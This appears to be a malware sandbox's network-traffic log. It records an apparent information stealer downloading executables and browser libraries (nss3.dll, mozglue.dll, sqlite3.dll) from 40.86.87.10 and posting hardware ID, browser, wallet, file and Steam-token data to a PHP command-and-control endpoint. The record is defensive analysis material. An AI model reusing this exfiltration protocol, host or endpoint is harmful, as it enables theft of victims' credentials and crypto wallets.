00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:13 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:14 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 40.86.87.10Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 39 43 32 32 31 34 42 44 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 5a 4f 56 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"5B9C2214BD8B2768236643------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"ZOV------HDGIJJDGCBKFIDHIEBKE--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDAHost: 40.86.87.10Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 2d 2d 0d 0a Data Ascii: ------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="message"browsers------BKJDGCGDAAAKECAKKJDA--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 40.86.87.10Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 2d 2d 0d 0a Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"plugins------AEBGHDBKEBGIDHJJEHCA--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 40.86.87.10Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 2d 2d 0d 0a Data Ascii: ------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="message"fplugins------AEBKFIJEGCAAFHJKFCFC--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDAAEGIDHDGCAAFCBAHost: 40.86.87.10Content-Length: 5935Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/sqlite3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 40.86.87.10Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECFHost: 40.86.87.10Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJHost: 40.86.87.10Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 2d 2d 0d 0a Data Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="file"------IJJJEBFHDBGIECBFCBKJ--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJKHost: 40.86.87.10Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="file"------GDGDHJJDGHCAAAKEHIJK--
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/freebl3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/mozglue.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/msvcp140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/nss3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/softokn3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/vcruntime140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFHost: 40.86.87.10Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCBKECAKFBGCAKECGIEHost: 40.86.87.10Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 2d 2d 0d 0a Data Ascii: ------DGCBKECAKFBGCAKECGIEContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------DGCBKECAKFBGCAKECGIEContent-Disposition: form-data; name="message"wallets------DGCBKECAKFBGCAKECGIE--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 40.86.87.10Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="message"files------JEGHJDGIJECGDHJJECGH--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFHDBGHJKFIDHJJJEBKHost: 40.86.87.10Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="file"------CAFHDBGHJKFIDHJJJEBK--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECHost: 40.86.87.10Content-Length: 97855Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 40.86.87.10Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 